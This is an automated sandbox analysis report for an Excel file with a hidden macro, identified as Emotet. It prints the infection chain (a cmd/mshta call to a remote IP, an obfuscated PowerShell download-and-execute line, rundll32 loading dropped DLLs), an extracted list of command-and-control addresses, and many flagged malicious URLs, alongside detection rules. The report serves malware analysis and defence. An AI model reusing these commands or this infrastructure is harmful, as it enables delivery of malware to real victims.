Joe Sandbox Cloud Basic Analysis Report

Loading Joe Sandbox Report ...

Edit tour

Windows Analysis Report
DOCUMENT_2801.xls

Overview

General Information

Sample Name:DOCUMENT_2801.xls
Analysis ID:562416
MD5:3f397d9cca325167d86d575896d40207
SHA1:54b8106c1715eb58230371fa033cbdec1e3aaeff
SHA256:f695adbe8668cdef7b307bc0fc89a664d8002b42dc91b8a01a75aec4cfc9018c
Tags:SilentBuilderxls
Infos:

Detection

Hidden Macro 4.0 Emotet
Score:100
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Snort IDS alert for network traffic (e.g. based on Emerging Threat rules)
System process connects to network (likely due to code injection or exploit)
Antivirus detection for URL or domain
Found malicious Excel 4.0 Macro
Found malware configuration
Multi AV Scanner detection for submitted file
Office document tries to convince victim to disable security protection (e.g. to enable ActiveX or Macros)
Yara detected Emotet
Multi AV Scanner detection for domain / URL
Sigma detected: Windows Shell File Write to Suspicious Folder
Document contains OLE streams with names of living off the land binaries
Passes commands via pipe to a shell (likely to bypass AV or HIPS)
Powershell drops PE file
Sigma detected: MSHTA Spawning Windows Shell
Hides that the sample has been downloaded from the Internet (zone.identifier)
Document exploit detected (process start blacklist hit)
Sigma detected: Suspicious MSHTA Process Patterns
Sigma detected: Microsoft Office Product Spawning Windows Shell
Sigma detected: Suspicious PowerShell Command Line
Found Excel 4.0 Macro with suspicious formulas
Machine Learning detection for dropped file
Sigma detected: Mshta Spawning Windows Shell
C2 URLs / IPs found in malware configuration
Drops PE files to the application program directory (C:\ProgramData)
Contains functionality to query locales information (e.g. system language)
Very long cmdline option found, this is very uncommon (may be encrypted or packed)
May sleep (evasive loops) to hinder dynamic analysis
Uses code obfuscation techniques (call, push, ret)
Detected potential crypto function
Contains functionality to check if a window is minimized (may be used to check if an application is visible)
Contains functionality to dynamically determine API calls
HTTP GET or POST without a user agent
Downloads executable code via HTTP
Document misses a certain OLE stream usually present in this Microsoft Office document type
Abnormal high CPU Usage
Found a hidden Excel 4.0 Macro sheet
Potential document exploit detected (unknown TCP traffic)
Searches for the Microsoft Outlook file path
Drops PE files
Contains functionality to read the PEB
Uses a known web browser user agent for HTTP communication
Drops PE files to the windows directory (C:\Windows)
Found large amount of non-executed APIs
Allocates memory within range which is reserved for system DLLs (kernel32.dll, advapi32.dll, etc)
Contains functionality to delete services
Creates a process in suspended mode (likely to inject code)
Queries the volume information (name, serial number etc) of a device
Yara signature match
Contains functionality to check if a debugger is running (IsDebuggerPresent)
Creates files inside the system directory
Internet Provider seen in connection with other malware
Contains functionality to query CPU information (cpuid)
Found potential string decryption / allocating functions
Potential document exploit detected (performs DNS queries)
Contains functionality which may be used to detect a debugger (GetProcessHeap)
IP address seen in connection with other malware
Enables debug privileges
PE file contains an invalid checksum
Yara detected Xls With Macro 4.0
Detected TCP or UDP traffic on non-standard ports
Connects to several IPs in different countries
Potential key logger detected (key state polling based)
Creates a window with clipboard capturing capabilities
Document contains embedded VBA macros
Potential document exploit detected (performs HTTP gets)

Classification

Process Tree

  • System is w7x64
  • EXCEL.EXE (PID: 684 cmdline: "C:\Program Files\Microsoft Office\Office14\EXCEL.EXE" /automation -Embedding MD5: D53B85E21886D2AF9815C377537BCAC3)
    • cmd.exe (PID: 572 cmdline: cmd /c set ooo=mshta http://91.240.118.172/ee/ss/se.html & echo %ooo% | cmd MD5: 5746BD7E255DD6A8AFA06F7C42C1BA41)
      • cmd.exe (PID: 2668 cmdline: C:\Windows\system32\cmd.exe /S /D /c" echo %ooo% " MD5: 5746BD7E255DD6A8AFA06F7C42C1BA41)
      • cmd.exe (PID: 2672 cmdline: cmd MD5: 5746BD7E255DD6A8AFA06F7C42C1BA41)
        • mshta.exe (PID: 2696 cmdline: mshta http://91.240.118.172/ee/ss/se.html MD5: 95828D670CFD3B16EE188168E083C3C5)
          • powershell.exe (PID: 1708 cmdline: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -noexit $c1='({FutuReD}{FutuReD}Ne{FutuReD}{FutuReD}w{FutuReD}-Obj{FutuReD}ec{FutuReD}{FutuReD}t N{FutuReD}{FutuReD}et{FutuReD}.W{FutuReD}{FutuReD}e'.replace('{FutuReD}', ''); $c4='bC{FutuReD}li{FutuReD}{FutuReD}en{FutuReD}{FutuReD}t).D{FutuReD}{FutuReD}ow{FutuReD}{FutuReD}nl{FutuReD}{FutuReD}{FutuReD}o'.replace('{FutuReD}', ''); $c3='ad{FutuReD}{FutuReD}St{FutuReD}rin{FutuReD}{FutuReD}g{FutuReD}(''ht{FutuReD}tp{FutuReD}://91.240.118.172/ee/ss/se.png'')'.replace('{FutuReD}', '');$JI=($c1,$c4,$c3 -Join '');I`E`X $JI|I`E`X MD5: 852D67A27E454BD389FA7F02A8CBE23F)
            • cmd.exe (PID: 1868 cmdline: "C:\Windows\system32\cmd.exe" /c C:\Windows\SysWow64\rundll32.exe C:\ProgramData\Milossd.dll KitKat MD5: 5746BD7E255DD6A8AFA06F7C42C1BA41)
              • rundll32.exe (PID: 2844 cmdline: C:\Windows\SysWow64\rundll32.exe C:\ProgramData\Milossd.dll KitKat MD5: 51138BEEA3E2C21EC44D0932C71762A8)
                • rundll32.exe (PID: 1124 cmdline: C:\Windows\SysWOW64\rundll32.exe "C:\ProgramData\Milossd.dll",DllRegisterServer MD5: 51138BEEA3E2C21EC44D0932C71762A8)
                  • rundll32.exe (PID: 344 cmdline: C:\Windows\SysWOW64\rundll32.exe "C:\Windows\SysWOW64\Hzcvqvi\kisyfwhhvxv.tpx",RIBFxhGufP MD5: 51138BEEA3E2C21EC44D0932C71762A8)
                    • rundll32.exe (PID: 2816 cmdline: C:\Windows\SysWOW64\rundll32.exe "C:\Windows\SysWOW64\Hzcvqvi\kisyfwhhvxv.tpx",DllRegisterServer MD5: 51138BEEA3E2C21EC44D0932C71762A8)
                      • rundll32.exe (PID: 1532 cmdline: C:\Windows\SysWOW64\rundll32.exe "C:\Windows\SysWOW64\Gjesjojdky\tnenolnsbc.zlf",RPzUMBQVQiRJfbr MD5: 51138BEEA3E2C21EC44D0932C71762A8)
                        • rundll32.exe (PID: 2904 cmdline: C:\Windows\SysWOW64\rundll32.exe "C:\Windows\SysWOW64\Gjesjojdky\tnenolnsbc.zlf",DllRegisterServer MD5: 51138BEEA3E2C21EC44D0932C71762A8)
  • cleanup

Malware Configuration

Threatname: Emotet

{"C2 list": ["74.207.230.120:8080", "139.196.72.155:8080", "37.44.244.177:8080", "37.59.209.141:8080", "116.124.128.206:8080", "217.182.143.207:443", "54.37.228.122:443", "203.153.216.46:443", "168.197.250.14:80", "207.148.81.119:8080", "195.154.146.35:443", "78.46.73.125:443", "191.252.103.16:80", "210.57.209.142:8080", "185.168.130.138:443", "142.4.219.173:8080", "118.98.72.86:443", "78.47.204.80:443", "159.69.237.188:443", "190.90.233.66:443", "104.131.62.48:8080", "62.171.178.147:8080", "185.148.168.15:8080", "54.38.242.185:443", "198.199.98.78:8080", "194.9.172.107:8080", "85.214.67.203:8080", "66.42.57.149:443", "185.148.168.220:8080", "103.41.204.169:8080", "128.199.192.135:8080", "195.77.239.39:8080", "59.148.253.194:443"], "Public Key": ["RUNTMSAAAAD0LxqDNhonUYwk8sqo7IWuUllRdUiUBnACc6romsQoe1YJD7wIe4AheqYofpZFucPDXCZ0z9i+ooUffqeoLZU0", "RUNLMSAAAADYNZPXY4tQxd/N4Wn5sTYAm5tUOxY2ol1ELrI4MNhHNi640vSLasjYTHpFRBoG+o84vtr7AJachCzOHjaAJFCW"]}

Yara Overview

Initial Sample

SourceRuleDescriptionAuthorStrings
DOCUMENT_2801.xlsSUSP_Excel4Macro_AutoOpenDetects Excel4 macro use with auto open / closeJohn Lambert @JohnLaTwC
  • 0x0:$header_docf: D0 CF 11 E0
  • 0x140a2:$s1: Excel
  • 0x15105:$s1: Excel
  • 0x3106:$Auto_Open: 18 00 17 00 20 00 00 01 07 00 00 00 00 00 00 00 00 00 00 01 3A
DOCUMENT_2801.xlsJoeSecurity_XlsWithMacro4Yara detected Xls With Macro 4.0Joe Security

    Dropped Files

    SourceRuleDescriptionAuthorStrings
    C:\Users\user\Desktop\DOCUMENT_2801.xlsSUSP_Excel4Macro_AutoOpenDetects Excel4 macro use with auto open / closeJohn Lambert @JohnLaTwC
    • 0x0:$header_docf: D0 CF 11 E0
    • 0x140a2:$s1: Excel
    • 0x15105:$s1: Excel
    • 0x3106:$Auto_Open: 18 00 17 00 20 00 00 01 07 00 00 00 00 00 00 00 00 00 00 01 3A
    C:\Users\user\Desktop\DOCUMENT_2801.xlsJoeSecurity_XlsWithMacro4Yara detected Xls With Macro 4.0Joe Security
      C:\ProgramData\Milossd.dllJoeSecurity_Emotet_1Yara detected EmotetJoe Security

        Memory Dumps

        SourceRuleDescriptionAuthorStrings
        00000011.00000002.664811796.0000000002D81000.00000020.00000001.00020000.00000000.sdmpJoeSecurity_Emotet_1Yara detected EmotetJoe Security
          0000000C.00000002.510464737.0000000002CF1000.00000020.00000800.00020000.00000000.sdmpJoeSecurity_Emotet_1Yara detected EmotetJoe Security
            0000000E.00000002.559443936.00000000001E0000.00000040.00000800.00020000.00000000.sdmpJoeSecurity_Emotet_1Yara detected EmotetJoe Security
              0000000C.00000002.510287777.00000000026A1000.00000020.00000800.00020000.00000000.sdmpJoeSecurity_Emotet_1Yara detected EmotetJoe Security
                0000000C.00000002.510076235.0000000000810000.00000040.00000800.00020000.00000000.sdmpJoeSecurity_Emotet_1Yara detected EmotetJoe Security
                  Click to see the 65 entries

                  Unpacked PEs

                  SourceRuleDescriptionAuthorStrings
                  17.2.rundll32.exe.27d0000.7.unpackJoeSecurity_Emotet_1Yara detected EmotetJoe Security
                    14.2.rundll32.exe.25b0000.9.unpackJoeSecurity_Emotet_1Yara detected EmotetJoe Security
                      17.2.rundll32.exe.3090000.27.unpackJoeSecurity_Emotet_1Yara detected EmotetJoe Security
                        17.2.rundll32.exe.2f70000.23.unpackJoeSecurity_Emotet_1Yara detected EmotetJoe Security
                          13.2.rundll32.exe.3c0000.0.unpackJoeSecurity_Emotet_1Yara detected EmotetJoe Security
                            Click to see the 97 entries

                            Sigma Overview

                            System Summary

                            barindex
                            Sigma detected: Windows Shell File Write to Suspicious Folder
                            Source: File createdAuthor: Florian Roth: Data: EventID: 11, Image: C:\Windows\System32\mshta.exe, ProcessId: 2696, TargetFilename: C:\Users\user\AppData\Local
                            Sigma detected: MSHTA Spawning Windows Shell
                            Source: Process startedAuthor: Michael Haag: Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -noexit $c1='({FutuReD}{FutuReD}Ne{FutuReD}{FutuReD}w{FutuReD}-Obj{FutuReD}ec{FutuReD}{FutuReD}t N{FutuReD}{FutuReD}et{FutuReD}.W{FutuReD}{FutuReD}e'.replace('{FutuReD}', ''); $c4='bC{FutuReD}li{FutuReD}{FutuReD}en{FutuReD}{FutuReD}t).D{FutuReD}{FutuReD}ow{FutuReD}{FutuReD}nl{FutuReD}{FutuReD}{FutuReD}o'.replace('{FutuReD}', ''); $c3='ad{FutuReD}{FutuReD}St{FutuReD}rin{FutuReD}{FutuReD}g{FutuReD}(''ht{FutuReD}tp{FutuReD}://91.240.118.172/ee/ss/se.png'')'.replace('{FutuReD}', '');$JI=($c1,$c4,$c3 -Join '');I`E`X $JI|I`E`X , CommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -noexit $c1='({FutuReD}{FutuReD}Ne{FutuReD}{FutuReD}w{FutuReD}-Obj{FutuReD}ec{FutuReD}{FutuReD}t N{FutuReD}{FutuReD}et{FutuReD}.W{FutuReD}{FutuReD}e'.replace('{FutuReD}', ''); $c4='bC{FutuReD}li{FutuReD}{FutuReD}en{FutuReD}{FutuReD}t).D{FutuReD}{FutuReD}ow{FutuReD}{FutuReD}nl{FutuReD}{FutuReD}{FutuReD}o'.replace('{FutuReD}', ''); $c3='ad{FutuReD}{FutuReD}St{FutuReD}rin{FutuReD}{FutuReD}g{FutuReD}(''ht{FutuReD}tp{FutuReD}://91.240.118.172/ee/ss/se.png'')'.replace('{FutuReD}', '');$JI=($c1,$c4,$c3 -Join '');I`E`X $JI|I`E`X , CommandLine|base64offset|contains: z+, Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: mshta http://91.240.118.172/ee/ss/se.html , ParentImage: C:\Windows\System32\mshta.exe, ParentProcessId: 2696, ProcessCommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -noexit $c1='({FutuReD}{FutuReD}Ne{FutuReD}{FutuReD}w{FutuReD}-Obj{FutuReD}ec{FutuReD}{FutuReD}t N{FutuReD}{FutuReD}et{FutuReD}.W{FutuReD}{FutuReD}e'.replace('{FutuReD}', ''); $c4='bC{FutuReD}li{FutuReD}{FutuReD}en{FutuReD}{FutuReD}t).D{FutuReD}{FutuReD}ow{FutuReD}{FutuReD}nl{FutuReD}{FutuReD}{FutuReD}o'.replace('{FutuReD}', ''); $c3='ad{FutuReD}{FutuReD}St{FutuReD}rin{FutuReD}{FutuReD}g{FutuReD}(''ht{FutuReD}tp{FutuReD}://91.240.118.172/ee/ss/se.png'')'.replace('{FutuReD}', '');$JI=($c1,$c4,$c3 -Join '');I`E`X $JI|I`E`X , ProcessId: 1708
                            Sigma detected: Suspicious MSHTA Process Patterns
                            Source: Process startedAuthor: Florian Roth: Data: Command: mshta http://91.240.118.172/ee/ss/se.html , CommandLine: mshta http://91.240.118.172/ee/ss/se.html , CommandLine|base64offset|contains: m, Image: C:\Windows\System32\mshta.exe, NewProcessName: C:\Windows\System32\mshta.exe, OriginalFileName: C:\Windows\System32\mshta.exe, ParentCommandLine: cmd, ParentImage: C:\Windows\System32\cmd.exe, ParentProcessId: 2672, ProcessCommandLine: mshta http://91.240.118.172/ee/ss/se.html , ProcessId: 2696
                            Sigma detected: Microsoft Office Product Spawning Windows Shell
                            Source: Process startedAuthor: Michael Haag, Florian Roth, Markus Neis, Elastic, FPT.EagleEye Team: Data: Command: cmd /c set ooo=mshta http://91.240.118.172/ee/ss/se.html & echo %ooo% | cmd, CommandLine: cmd /c set ooo=mshta http://91.240.118.172/ee/ss/se.html & echo %ooo% | cmd, CommandLine|base64offset|contains: rg, Image: C:\Windows\System32\cmd.exe, NewProcessName: C:\Windows\System32\cmd.exe, OriginalFileName: C:\Windows\System32\cmd.exe, ParentCommandLine: "C:\Program Files\Microsoft Office\Office14\EXCEL.EXE" /automation -Embedding, ParentImage: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE, ParentProcessId: 684, ProcessCommandLine: cmd /c set ooo=mshta http://91.240.118.172/ee/ss/se.html & echo %ooo% | cmd, ProcessId: 572
                            Sigma detected: Suspicious PowerShell Command Line
                            Source: Process startedAuthor: Teymur Kheirkhabarov (idea), Vasiliy Burov (rule), oscd.community, Tim Shelton (fp): Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -noexit $c1='({FutuReD}{FutuReD}Ne{FutuReD}{FutuReD}w{FutuReD}-Obj{FutuReD}ec{FutuReD}{FutuReD}t N{FutuReD}{FutuReD}et{FutuReD}.W{FutuReD}{FutuReD}e'.replace('{FutuReD}', ''); $c4='bC{FutuReD}li{FutuReD}{FutuReD}en{FutuReD}{FutuReD}t).D{FutuReD}{FutuReD}ow{FutuReD}{FutuReD}nl{FutuReD}{FutuReD}{FutuReD}o'.replace('{FutuReD}', ''); $c3='ad{FutuReD}{FutuReD}St{FutuReD}rin{FutuReD}{FutuReD}g{FutuReD}(''ht{FutuReD}tp{FutuReD}://91.240.118.172/ee/ss/se.png'')'.replace('{FutuReD}', '');$JI=($c1,$c4,$c3 -Join '');I`E`X $JI|I`E`X , CommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -noexit $c1='({FutuReD}{FutuReD}Ne{FutuReD}{FutuReD}w{FutuReD}-Obj{FutuReD}ec{FutuReD}{FutuReD}t N{FutuReD}{FutuReD}et{FutuReD}.W{FutuReD}{FutuReD}e'.replace('{FutuReD}', ''); $c4='bC{FutuReD}li{FutuReD}{FutuReD}en{FutuReD}{FutuReD}t).D{FutuReD}{FutuReD}ow{FutuReD}{FutuReD}nl{FutuReD}{FutuReD}{FutuReD}o'.replace('{FutuReD}', ''); $c3='ad{FutuReD}{FutuReD}St{FutuReD}rin{FutuReD}{FutuReD}g{FutuReD}(''ht{FutuReD}tp{FutuReD}://91.240.118.172/ee/ss/se.png'')'.replace('{FutuReD}', '');$JI=($c1,$c4,$c3 -Join '');I`E`X $JI|I`E`X , CommandLine|base64offset|contains: z+, Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: mshta http://91.240.118.172/ee/ss/se.html , ParentImage: C:\Windows\System32\mshta.exe, ParentProcessId: 2696, ProcessCommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -noexit $c1='({FutuReD}{FutuReD}Ne{FutuReD}{FutuReD}w{FutuReD}-Obj{FutuReD}ec{FutuReD}{FutuReD}t N{FutuReD}{FutuReD}et{FutuReD}.W{FutuReD}{FutuReD}e'.replace('{FutuReD}', ''); $c4='bC{FutuReD}li{FutuReD}{FutuReD}en{FutuReD}{FutuReD}t).D{FutuReD}{FutuReD}ow{FutuReD}{FutuReD}nl{FutuReD}{FutuReD}{FutuReD}o'.replace('{FutuReD}', ''); $c3='ad{FutuReD}{FutuReD}St{FutuReD}rin{FutuReD}{FutuReD}g{FutuReD}(''ht{FutuReD}tp{FutuReD}://91.240.118.172/ee/ss/se.png'')'.replace('{FutuReD}', '');$JI=($c1,$c4,$c3 -Join '');I`E`X $JI|I`E`X , ProcessId: 1708
                            Sigma detected: Mshta Spawning Windows Shell
                            Source: Process startedAuthor: Florian Roth: Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -noexit $c1='({FutuReD}{FutuReD}Ne{FutuReD}{FutuReD}w{FutuReD}-Obj{FutuReD}ec{FutuReD}{FutuReD}t N{FutuReD}{FutuReD}et{FutuReD}.W{FutuReD}{FutuReD}e'.replace('{FutuReD}', ''); $c4='bC{FutuReD}li{FutuReD}{FutuReD}en{FutuReD}{FutuReD}t).D{FutuReD}{FutuReD}ow{FutuReD}{FutuReD}nl{FutuReD}{FutuReD}{FutuReD}o'.replace('{FutuReD}', ''); $c3='ad{FutuReD}{FutuReD}St{FutuReD}rin{FutuReD}{FutuReD}g{FutuReD}(''ht{FutuReD}tp{FutuReD}://91.240.118.172/ee/ss/se.png'')'.replace('{FutuReD}', '');$JI=($c1,$c4,$c3 -Join '');I`E`X $JI|I`E`X , CommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -noexit $c1='({FutuReD}{FutuReD}Ne{FutuReD}{FutuReD}w{FutuReD}-Obj{FutuReD}ec{FutuReD}{FutuReD}t N{FutuReD}{FutuReD}et{FutuReD}.W{FutuReD}{FutuReD}e'.replace('{FutuReD}', ''); $c4='bC{FutuReD}li{FutuReD}{FutuReD}en{FutuReD}{FutuReD}t).D{FutuReD}{FutuReD}ow{FutuReD}{FutuReD}nl{FutuReD}{FutuReD}{FutuReD}o'.replace('{FutuReD}', ''); $c3='ad{FutuReD}{FutuReD}St{FutuReD}rin{FutuReD}{FutuReD}g{FutuReD}(''ht{FutuReD}tp{FutuReD}://91.240.118.172/ee/ss/se.png'')'.replace('{FutuReD}', '');$JI=($c1,$c4,$c3 -Join '');I`E`X $JI|I`E`X , CommandLine|base64offset|contains: z+, Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: mshta http://91.240.118.172/ee/ss/se.html , ParentImage: C:\Windows\System32\mshta.exe, ParentProcessId: 2696, ProcessCommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -noexit $c1='({FutuReD}{FutuReD}Ne{FutuReD}{FutuReD}w{FutuReD}-Obj{FutuReD}ec{FutuReD}{FutuReD}t N{FutuReD}{FutuReD}et{FutuReD}.W{FutuReD}{FutuReD}e'.replace('{FutuReD}', ''); $c4='bC{FutuReD}li{FutuReD}{FutuReD}en{FutuReD}{FutuReD}t).D{FutuReD}{FutuReD}ow{FutuReD}{FutuReD}nl{FutuReD}{FutuReD}{FutuReD}o'.replace('{FutuReD}', ''); $c3='ad{FutuReD}{FutuReD}St{FutuReD}rin{FutuReD}{FutuReD}g{FutuReD}(''ht{FutuReD}tp{FutuReD}://91.240.118.172/ee/ss/se.png'')'.replace('{FutuReD}', '');$JI=($c1,$c4,$c3 -Join '');I`E`X $JI|I`E`X , ProcessId: 1708
                            Source: Process startedAuthor: Roberto Rodriguez @Cyb3rWard0g (rule), oscd.community (improvements): Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -noexit $c1='({FutuReD}{FutuReD}Ne{FutuReD}{FutuReD}w{FutuReD}-Obj{FutuReD}ec{FutuReD}{FutuReD}t N{FutuReD}{FutuReD}et{FutuReD}.W{FutuReD}{FutuReD}e'.replace('{FutuReD}', ''); $c4='bC{FutuReD}li{FutuReD}{FutuReD}en{FutuReD}{FutuReD}t).D{FutuReD}{FutuReD}ow{FutuReD}{FutuReD}nl{FutuReD}{FutuReD}{FutuReD}o'.replace('{FutuReD}', ''); $c3='ad{FutuReD}{FutuReD}St{FutuReD}rin{FutuReD}{FutuReD}g{FutuReD}(''ht{FutuReD}tp{FutuReD}://91.240.118.172/ee/ss/se.png'')'.replace('{FutuReD}', '');$JI=($c1,$c4,$c3 -Join '');I`E`X $JI|I`E`X , CommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -noexit $c1='({FutuReD}{FutuReD}Ne{FutuReD}{FutuReD}w{FutuReD}-Obj{FutuReD}ec{FutuReD}{FutuReD}t N{FutuReD}{FutuReD}et{FutuReD}.W{FutuReD}{FutuReD}e'.replace('{FutuReD}', ''); $c4='bC{FutuReD}li{FutuReD}{FutuReD}en{FutuReD}{FutuReD}t).D{FutuReD}{FutuReD}ow{FutuReD}{FutuReD}nl{FutuReD}{FutuReD}{FutuReD}o'.replace('{FutuReD}', ''); $c3='ad{FutuReD}{FutuReD}St{FutuReD}rin{FutuReD}{FutuReD}g{FutuReD}(''ht{FutuReD}tp{FutuReD}://91.240.118.172/ee/ss/se.png'')'.replace('{FutuReD}', '');$JI=($c1,$c4,$c3 -Join '');I`E`X $JI|I`E`X , CommandLine|base64offset|contains: z+, Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: mshta http://91.240.118.172/ee/ss/se.html , ParentImage: C:\Windows\System32\mshta.exe, ParentProcessId: 2696, ProcessCommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -noexit $c1='({FutuReD}{FutuReD}Ne{FutuReD}{FutuReD}w{FutuReD}-Obj{FutuReD}ec{FutuReD}{FutuReD}t N{FutuReD}{FutuReD}et{FutuReD}.W{FutuReD}{FutuReD}e'.replace('{FutuReD}', ''); $c4='bC{FutuReD}li{FutuReD}{FutuReD}en{FutuReD}{FutuReD}t).D{FutuReD}{FutuReD}ow{FutuReD}{FutuReD}nl{FutuReD}{FutuReD}{FutuReD}o'.replace('{FutuReD}', ''); $c3='ad{FutuReD}{FutuReD}St{FutuReD}rin{FutuReD}{FutuReD}g{FutuReD}(''ht{FutuReD}tp{FutuReD}://91.240.118.172/ee/ss/se.png'')'.replace('{FutuReD}', '');$JI=($c1,$c4,$c3 -Join '');I`E`X $JI|I`E`X , ProcessId: 1708

                            Jbx Signature Overview

                            Click to jump to signature section

                            Show All Signature Results

                            AV Detection

                            barindex
                            Antivirus detection for URL or domain
                            Source: http://tamiladsense.com/wp-includes/BEADvqGgemV8SnTX/PE3Avira URL Cloud: Label: malware
                            Source: http://engaz.shop/wp-content/MOllqUm2nb/PE3Avira URL Cloud: Label: malware
                            Source: http://engaz.shop/wp-content/MOllqUm2nb/Avira URL Cloud: Label: malware
                            Source: https://lastregaristorante.com/wp-admin/ffdC7ElM2Bn2/PE3Avira URL Cloud: Label: malware
                            Source: http://91.240.118.172/ee/ss/se.htmlAvira URL Cloud: Label: malware
                            Source: http://3-fasen.com/wp-content/3Bl0hBbW/PE3Avira URL Cloud: Label: malware
                            Source: https://oculusvisioncare.com/wp-includes/ZEYDjosbNExFTdu/Avira URL Cloud: Label: malware
                            Source: http://manchesterheatingservices.youprocontact.com/wp-admin/AiK1Avira URL Cloud: Label: malware
                            Source: https://ecobaby.pi-dh.com/Serendib/gl1hcef9Y3GSTCDC/Avira URL Cloud: Label: malware
                            Source: http://manchesterheatingservices.youprocontact.com/wp-admin/AiK19uMf/PE3Avira URL Cloud: Label: malware
                            Source: https://oculusvisioncare.com/wp-includes/ZEYDjosbNExFTdu/PE3Avira URL Cloud: Label: malware
                            Source: http://tunbridgeservices.com/jfoeqhxz/zOX0/PE3Avira URL Cloud: Label: malware
                            Source: https://ecobaby.pi-dh.com/Serendib/gl1hcef9Y3GSTCDC/PE3Avira URL Cloud: Label: malware
                            Source: http://tamiladsense.com/wp-incluAvira URL Cloud: Label: malware
                            Source: http://onexone.elementor.cloud/cdrxhrt/uVE0uVHOz5E/Avira URL Cloud: Label: malware
                            Source: http://imaginariumstore.fun/ncsbAvira URL Cloud: Label: malware
                            Source: https://mypurealsystem.com/App_Start/Rhh8lKO/PE3Avira URL Cloud: Label: malware
                            Source: https://ecobaby.pi-dh.com/SerendAvira URL Cloud: Label: malware
                            Source: http://3-fasen.com/wp-content/3BAvira URL Cloud: Label: malware
                            Source: http://onexone.elementor.cloud/cAvira URL Cloud: Label: malware
                            Source: http://3-fasen.com/wp-content/3Bl0hBbW/Avira URL Cloud: Label: malware
                            Source: http://engaz.shop/wp-content/MOlAvira URL Cloud: Label: malware
                            Source: https://mypurealsystem.com/App_Start/Rhh8lKO/Avira URL Cloud: Label: malware
                            Source: https://vn.minino.com/wp-admin/c3WQa/PE3Avira URL Cloud: Label: malware
                            Source: https://vn.minino.com/wp-admin/c3WQa/Avira URL Cloud: Label: malware
                            Source: http://tamiladsense.com/wp-includes/BEADvqGgemV8SnTX/Avira URL Cloud: Label: malware
                            Source: http://onexone.elementor.cloud/cdrxhrt/uVE0uVHOz5E/PE3Avira URL Cloud: Label: malware
                            Source: http://imaginariumstore.fun/ncsb/cyGoTYqMmcRwvqdre/Avira URL Cloud: Label: malware
                            Source: http://devbhoomigaushala.org/Getae/Vyo5rrNLAgd0QxXvkv/Avira URL Cloud: Label: malware
                            Source: http://tamiladsense.comAvira URL Cloud: Label: malware
                            Source: http://tunbridgeservices.com/jfoeqhxz/zOX0/Avira URL Cloud: Label: malware
                            Source: http://manchesterheatingservices.youprocontact.com/wp-admin/AiK19uMf/Avira URL Cloud: Label: malware
                            Source: http://devbhoomigaushala.org/Getae/Vyo5rrNLAgd0QxXvkv/PE3Avira URL Cloud: Label: malware
                            Source: http://91.240.118.172/ee/ss/se.pngAvira URL Cloud: Label: malware
                            Source: http://imaginariumstore.fun/ncsb/cyGoTYqMmcRwvqdre/PE3Avira URL Cloud: Label: malware
                            Source: https://lastregaristorante.com/wp-admin/ffdC7ElM2Bn2/Avira URL Cloud: Label: malware
                            Found malware configuration
                            Source: 17.2.rundll32.exe.3090000.27.unpackMalware Configuration Extractor: Emotet {"C2 list": ["74.207.230.120:8080", "139.196.72.155:8080", "37.44.244.177:8080", "37.59.209.141:8080", "116.124.128.206:8080", "217.182.143.207:443", "54.37.228.122:443", "203.153.216.46:443", "168.197.250.14:80", "207.148.81.119:8080", "195.154.146.35:443", "78.46.73.125:443", "191.252.103.16:80", "210.57.209.142:8080", "185.168.130.138:443", "142.4.219.173:8080", "118.98.72.86:443", "78.47.204.80:443", "159.69.237.188:443", "190.90.233.66:443", "104.131.62.48:8080", "62.171.178.147:8080", "185.148.168.15:8080", "54.38.242.185:443", "198.199.98.78:8080", "194.9.172.107:8080", "85.214.67.203:8080", "66.42.57.149:443", "185.148.168.220:8080", "103.41.204.169:8080", "128.199.192.135:8080", "195.77.239.39:8080", "59.148.253.194:443"], "Public Key": ["RUNTMSAAAAD0LxqDNhonUYwk8sqo7IWuUllRdUiUBnACc6romsQoe1YJD7wIe4AheqYofpZFucPDXCZ0z9i+ooUffqeoLZU0", "RUNLMSAAAADYNZPXY4tQxd/N4Wn5sTYAm5tUOxY2ol1ELrI4MNhHNi640vSLasjYTHpFRBoG+o84vtr7AJachCzOHjaAJFCW"]}
                            Multi AV Scanner detection for submitted file
                            Source: DOCUMENT_2801.xlsReversingLabs: Detection: 16%
                            Multi AV Scanner detection for domain / URL
                            Source: tamiladsense.comVirustotal: Detection: 7%Perma Link
                            Machine Learning detection for dropped file
                            Source: C:\ProgramData\Milossd.dllJoe Sandbox ML: detected
                            Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEFile opened: C:\Windows\WinSxS\amd64_microsoft.vc90.crt_1fc8b3b9a1e18e3b_9.0.30729.4940_none_08e4299fa83d7e3c\MSVCR90.dllJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Users\userJump to behavior
